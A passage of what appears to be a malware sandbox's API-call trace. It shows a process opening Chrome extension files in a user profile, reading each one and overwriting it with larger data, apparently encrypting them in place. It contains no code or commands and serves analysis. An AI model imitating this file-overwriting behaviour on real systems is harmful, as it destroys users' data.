lpMultiByteStr=0x1f7340c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0169.787] ReadFile (in: hFile=0x1fc, lpBuffer=0x1eea538, nNumberOfBytesToRead=0xfe, lpNumberOfBytesRead=0x2fdf2bc, lpOverlapped=0x0 | out: lpBuffer=0x1eea538*, lpNumberOfBytesRead=0x2fdf2bc*=0xfe, lpOverlapped=0x0) returned 1 [0169.789] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf300*=0) returned 0x0 [0169.789] WriteFile (in: hFile=0x1fc, lpBuffer=0x2840958*, nNumberOfBytesToWrite=0x686, lpNumberOfBytesWritten=0x2fdf2d0, lpOverlapped=0x0 | out: lpBuffer=0x2840958*, lpNumberOfBytesWritten=0x2fdf2d0*=0x686, lpOverlapped=0x0) returned 1 [0169.790] CloseHandle (hObject=0x1fc) returned 1 [0169.791] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\128.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\128.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0169.792] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0169.792] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x1a33 [0169.793] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0169.793] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0169.793] ReleaseMutex (hMutex=0x168) returned 1 [0169.793] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="128.png", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0169.793] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="128.png", cchWideChar=7, lpMultiByteStr=0x1f7ad5c, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="128.png", lpUsedDefaultChar=0x0) returned 7 [0169.793] ReadFile (in: hFile=0x1fc, lpBuffer=0x2667868, nNumberOfBytesToRead=0x1a33, lpNumberOfBytesRead=0x2fdf2bc, lpOverlapped=0x0 | out: lpBuffer=0x2667868*, lpNumberOfBytesRead=0x2fdf2bc*=0x1a33, lpOverlapped=0x0) returned 1 [0169.796] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf300*=0) returned 0x0 [0169.796] WriteFile (in: hFile=0x1fc, lpBuffer=0x2893a78*, nNumberOfBytesToWrite=0x1fbb, lpNumberOfBytesWritten=0x2fdf2d0, lpOverlapped=0x0 | out: lpBuffer=0x2893a78*, lpNumberOfBytesWritten=0x2fdf2d0*=0x1fbb, lpOverlapped=0x0) returned 1 [0169.796] CloseHandle (hObject=0x1fc) returned 1 [0169.797] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\el\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\el\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0169.798] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0169.798] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x149 [0169.798] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0169.798] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0169.799] ReleaseMutex (hMutex=0x168) returned 1 [0169.799] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0169.799] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7342c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0169.799] ReadFile (in: hFile=0x1fc, lpBuffer=0x2851278, nNumberOfBytesToRead=0x149, lpNumberOfBytesRead=0x2fdf2bc, lpOverlapped=0x0 | out: lpBuffer=0x2851278*, lpNumberOfBytesRead=0x2fdf2bc*=0x149, lpOverlapped=0x0) returned 1 [0169.800] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf300*=0) returned 0x0 [0169.800] WriteFile (in: hFile=0x1fc, lpBuffer=0x2840958*, nNumberOfBytesToWrite=0x6d1, lpNumberOfBytesWritten=0x2fdf2d0, lpOverlapped=0x0 | out: lpBuffer=0x2840958*, lpNumberOfBytesWritten=0x2fdf2d0*=0x6d1, lpOverlapped=0x0) returned 1 [0169.801] CloseHandle (hObject=0x1fc) returned 1 [0169.801] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fil\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fil\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0169.802] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0169.802] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x104 [0169.802] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0169.802] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0169.802] ReleaseMutex (hMutex=0x168) returned 1 [0169.803] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0169.803] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f735ac, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0169.803] ReadFile (in: hFile=0x1fc, lpBuffer=0x1eea538, nNumberOfBytesToRead=0x104, lpNumberOfBytesRead=0x2fdf2bc, lpOverlapped=0x0 | out: lpBuffer=0x1eea538*, lpNumberOfBytesRead=0x2fdf2bc*=0x104, lpOverlapped=0x0) returned 1 [0169.804] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf300*=0) returned 0x0 [0169.805] WriteFile (in: hFile=0x1fc, lpBuffer=0x2840958*, nNumberOfBytesToWrite=0x68c, lpNumberOfBytesWritten=0x2fdf2d0, lpOverlapped=0x0 | out: lpBuffer=0x2840958*, lpNumberOfBytesWritten=0x2fdf2d0*=0x68c, lpOverlapped=0x0) returned 1 [0169.806] CloseHandle (hObject=0x1fc) returned 1 [0169.807] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ja\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ja\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0169.807] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0169.807] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x125 [0169.808] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0169.808] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0169.808] ReleaseMutex (hMutex=0x168) returned 1 [0169.808] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0169.808] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7342c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0169.808] ReadFile (in: hFile=0x1fc, lpBuffer=0x1f199a8, nNumberOfBytesToRead=0x125, lpNumberOfBytesRead=0x2fdf2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f199a8*, lpNumberOfBytesRead=0x2fdf2bc*=0x125, lpOverlapped=0x0) returned 1 [0169.809] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf300*=0) returned 0x0 [0169.810] WriteFile (in: hFile=0x1fc, lpBuffer=0x2840958*, nNumberOfBytesToWrite=0x6ad, lpNumberOfBytesWritten=0x2fdf2d0, lpOverlapped=0x0 | out: lpBuffer=0x2840958*, lpNumberOfBytesWritten=0x2fdf2d0*=0x6ad, lpOverlapped=0x0) returned 1 [0169.810] CloseHandle (hObject=0x1fc) returned 1 [0169.810] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pt_BR\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pt_br\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0169.811] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0169.811] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0xf6 [0169.811] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0169.812] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0169.812] ReleaseMutex (hMutex=0x168) returned 1 [0169.812] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0169.812] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f735ac, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0169.812] ReadFile (in: hFile=0x1fc, lpBuffer=0x1eea538, nNumberOfBytesToRead=0xf6, lpNumberOfBytesRead=0x2fdf2bc, lpOverlapped=0x0 | out: lpBuffer=0x1eea538*, lpNumberOfBytesRead=0x2fdf2bc*=0xf6, lpOverlapped=0x0) returned 1 [0169.813] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf300*=0) returned 0x0 [0169.813] WriteFile (in: hFile=0x1fc, lpBuffer=0x2840958*, nNumberOfBytesToWrite=0x67e, lpNumberOfBytesWritten=0x2fdf2d0, lpOverlapped=0x0 | out: lpBuffer=0x2840958*, lpNumberOfBytesWritten=0x2fdf2d0*=0x67e, lpOverlapped=0x0) returned 1 [0169.814] CloseHandle (hObject=0x1fc) returned 1 [0169.818] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\th\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\th\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0169.819] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0169.819] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x164 [0170.737] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0170.737] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0170.737] ReleaseMutex (hMutex=0x168) returned 1 [0170.737] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0170.737] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7340c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0170.737] ReadFile (in: hFile=0x1fc, lpBuffer=0x26a93e8, nNumberOfBytesToRead=0x164, lpNumberOfBytesRead=0x2fdf2bc, lpOverlapped=0x0 | out: lpBuffer=0x26a93e8*, lpNumberOfBytesRead=0x2fdf2bc*=0x164, lpOverlapped=0x0) returned 1 [0170.739] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf300*=0) returned 0x0 [0170.739] WriteFile (in: hFile=0x1fc, lpBuffer=0x2844988*, nNumberOfBytesToWrite=0x6ec, lpNumberOfBytesWritten=0x2fdf2d0, lpOverlapped=0x0 | out: lpBuffer=0x2844988*, lpNumberOfBytesWritten=0x2fdf2d0*=0x6ec, lpOverlapped=0x0) returned 1 [0170.739] CloseHandle (hObject=0x1fc) returned 1 [0170.740] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\manifest.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\manifest.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0170.741] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0170.741] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x2d8 [0170.741] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0170.741] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0170.741] ReleaseMutex (hMutex=0x168) returned 1 [0170.742] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="manifest.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0170.742] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="manifest.json", cchWideChar=13, lpMultiByteStr=0x1f732cc, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="manifest.json", lpUsedDefaultChar=0x0) returned 13 [0170.742] ReadFile (in: hFile=0x1fc, lpBuffer=0x2893a98, nNumberOfBytesToRead=0x2d8, lpNumberOfBytesRead=0x2fdf2bc, lpOverlapped=0x0 | out: lpBuffer=0x2893a98*, lpNumberOfBytesRead=0x2fdf2bc*=0x2d8, lpOverlapped=0x0) returned 1 [0170.744] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf300*=0) returned 0x0 [0170.744] WriteFile (in: hFile=0x1fc, lpBuffer=0x2844988*, nNumberOfBytesToWrite=0x860, lpNumberOfBytesWritten=0x2fdf2d0, lpOverlapped=0x0 | out: lpBuffer=0x2844988*, lpNumberOfBytesWritten=0x2fdf2d0*=0x860, lpOverlapped=0x0) returned 1 [0170.744] CloseHandle (hObject=0x1fc) returned 1 [0170.745] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\en\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\en\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0170.746] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0170.746] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0xb3 [0170.746] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0170.746] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0170.746] ReleaseMutex (hMutex=0x168) returned 1 [0170.747] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0170.747] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7340c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0170.747] ReadFile (in: hFile=0x1fc, lpBuffer=0x1f35ad8, nNumberOfBytesToRead=0xb3, lpNumberOfBytesRead=0x2fdf2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f35ad8*, lpNumberOfBytesRead=0x2fdf2bc*=0xb3, lpOverlapped=0x0) returned 1 [0170.748] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf300*=0) returned 0x0 [0170.748] WriteFile (in: hFile=0x1fc, lpBuffer=0x26cf6b8*, nNumberOfBytesToWrite=0x63b, lpNumberOfBytesWritten=0x2fdf2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf6b8*, lpNumberOfBytesWritten=0x2fdf2d0*=0x63b, lpOverlapped=0x0) returned 1 [0170.749] CloseHandle (hObject=0x1fc) returned 1 [0170.749] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hu\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hu\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0170.750] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0170.751] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0xb3 [0170.751] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0170.751] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0170.751] ReleaseMutex (hMutex=0x168) returned 1 [0170.751] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0170.751] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f732cc, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0170.751] ReadFile (in: hFile=0x1fc, lpBuffer=0x1f35ad8, nNumberOfBytesToRead=0xb3, lpNumberOfBytesRead=0x2fdf2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f35ad8*, lpNumberOfBytesRead=0x2fdf2bc*=0xb3, lpOverlapped=0x0) returned 1 [0170.753] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf300*=0) returned 0x0 [0170.753] WriteFile (in: hFile=0x1fc, lpBuffer=0x26cf6b8*, nNumberOfBytesToWrite=0x63b, lpNumberOfBytesWritten=0x2fdf2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf6b8*, lpNumberOfBytesWritten=0x2fdf2d0*=0x63b, lpOverlapped=0x0) returned 1 [0170.753] CloseHandle (hObject=0x1fc) returned 1 [0170.753] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\no\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\no\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0170.754] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0170.755] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x9f [0170.755] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0170.755] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0170.755] ReleaseMutex (hMutex=0x168) returned 1 [0170.755] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 